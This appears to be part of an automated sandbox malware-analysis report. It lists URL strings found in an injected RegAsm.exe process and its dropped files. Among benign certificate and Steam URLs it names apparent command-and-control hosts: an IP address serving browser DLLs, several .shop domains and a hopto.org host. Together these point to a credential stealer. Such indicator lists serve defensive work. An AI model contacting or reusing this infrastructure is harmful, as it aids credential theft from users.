Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434760341.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreemen
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434760341.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434760341.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417975487.000000006F90D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2393899413.000000002041D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://116.203.165.127
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/freebl3.dll~t
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/mozglue.dllNu
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/nss3.dlllu
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/softokn3.dllS
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/sqlp.dll
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/vcruntime140.dlli
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127JD
Source: FHCAEG.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://achievenmtynwjq.shop/
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://achievenmtynwjq.shop/K
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef4:
Source: RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 00000009.00000002.2434838718.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://carrtychaintnyw.shop/
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://carrtychaintnyw.shop/y
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: FHCAEG.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FHCAEG.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FHCAEG.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.a
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Bh1h47R1I7Wg&a
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434760341.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCs
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fIns
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=83YueuslRxGq&l=e
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.su
Source: RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cowod.hopto.org/
Source: FHCAEG.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FHCAEG.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
